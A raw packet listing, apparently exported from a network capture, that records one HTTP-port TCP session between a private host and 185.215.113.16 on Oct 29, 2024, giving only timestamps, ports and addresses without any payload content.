Oct 29, 2024 06:59:24.923147917 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.923157930 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.923194885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.923229933 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.923243046 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.923264027 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.923297882 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.923324108 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.923355103 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.923871040 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.963716030 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.963769913 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.963840008 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.004690886 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.004730940 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.004786015 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.004837036 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.004838943 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.004873991 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.004877090 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.004909039 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.004961014 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.004992962 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005012035 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.005028963 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005037069 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.005063057 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005096912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005108118 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.005131960 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005166054 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005177975 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.005215883 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005259991 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.005268097 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005320072 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005371094 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005384922 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.005409002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005461931 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005470991 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.005511999 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005544901 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005561113 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.005597115 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005630970 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005662918 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005676985 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.005698919 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005703926 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.005736113 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005770922 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005778074 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.005800962 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005832911 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005861044 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.005867004 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005901098 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005934954 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.005987883 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.041270018 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041347027 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041400909 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041412115 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.041435957 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041472912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041486979 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.041526079 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041560888 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041574955 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.041595936 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041650057 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041682959 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041697025 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.041727066 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.041733027 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041785002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041819096 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041851044 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041866064 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.041886091 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041892052 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.041920900 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041954041 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.041980982 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.041990995 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042026043 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042036057 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.042061090 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042094946 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042128086 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042138100 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.042162895 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042196989 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042212963 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.042228937 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042234898 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.042263985 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042296886 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042311907 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.042331934 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042378902 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042423010 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.042428970 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042464972 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042500019 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042521000 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.042536974 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042541981 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.042572975 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042617083 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.042623997 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042659044 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042690992 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042725086 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042742014 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.042776108 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042809963 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042820930 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.042854071 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.042860031 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042897940 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042932034 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.042942047 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.042968035 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043015957 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043050051 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043056011 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.043085098 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043118954 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043129921 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.043153048 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043158054 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.043190002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043224096 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043236017 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.043276072 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043322086 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.043339968 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043386936 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043420076 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043454885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043463945 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.043489933 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043524981 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043534040 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.043560982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.043574095 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.049877882 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.123625040 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.123698950 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.123754978 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.124207973 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124259949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124294996 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124329090 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124339104 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.124373913 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.124402046 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124432087 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124474049 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.124483109 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124517918 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124551058 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124596119 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.124600887 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124635935 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124670029 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124681950 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.124705076 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124716997 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.124757051 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124790907 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124825954 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124841928 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.124859095 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124880075 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.124923944 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124953032 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.124974012 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.125004053 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.125039101 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.125047922 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.125087976 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.125140905 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.125144005 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.125195026 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.125228882 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.125247002 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.125263929 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.125298023 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.125304937 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.125334978 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.125369072 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.125380039 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.125401974 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.125436068 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.125448942 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.125483036 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.125516891 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.125547886 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.125559092 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.125637054 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.160659075 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.160712957 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.160767078 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.160782099 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.160819054 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.160852909 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.160903931 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.160908937 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.160954952 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.160963058 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.161007881 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161051035 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.161057949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161092997 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161142111 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161149025 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.161346912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161382914 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161396027 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.161412954 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161463022 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.161467075 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161501884 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161534071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161566973 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161580086 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.161604881 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.161617041 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161650896 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161683083 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161695957 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.161734104 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161767006 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161782980 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.161818027 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161850929 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.161866903 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.162005901 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162055969 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162086964 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.162091017 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162127018 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162131071 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.162159920 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162194967 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162209988 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.162228107 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162272930 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.162280083 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162328005 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162369967 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.162378073 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162427902 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162477970 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.162480116 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162513971 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162547112 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162564039 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.162578106 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162610054 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162623882 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.162645102 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162678957 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162693024 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.162714005 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162746906 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162758112 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.162781954 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162815094 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162826061 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.162851095 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162887096 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162895918 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.162939072 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162972927 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.162986994 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.163007021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.163042068 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.163070917 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.163078070 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.163111925 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.163125038 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.163151979 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.163187027 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.163198948 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.163223982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.163258076 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.163269997 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.163292885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.163343906 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.163347006 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.163381100 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.163429022 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.163445950 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.163479090 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.163525105 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.169599056 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.243729115 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.243803978 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.243849993 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.243854046 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.243890047 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.243922949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.243937016 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.243976116 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244004965 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244054079 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.244195938 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244246960 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.244246960 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244299889 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244332075 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244342089 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.244365931 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244409084 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.244415998 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244467020 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244499922 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244533062 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244541883 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.244581938 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244632006 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244633913 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.244682074 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244728088 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.244731903 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244765043 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244775057 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.244818926 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244848967 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244868040 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.244899988 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244947910 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.244951010 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.244983912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.245017052 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.245029926 CET	49769	80	192.168.2.6	185.215.113.16
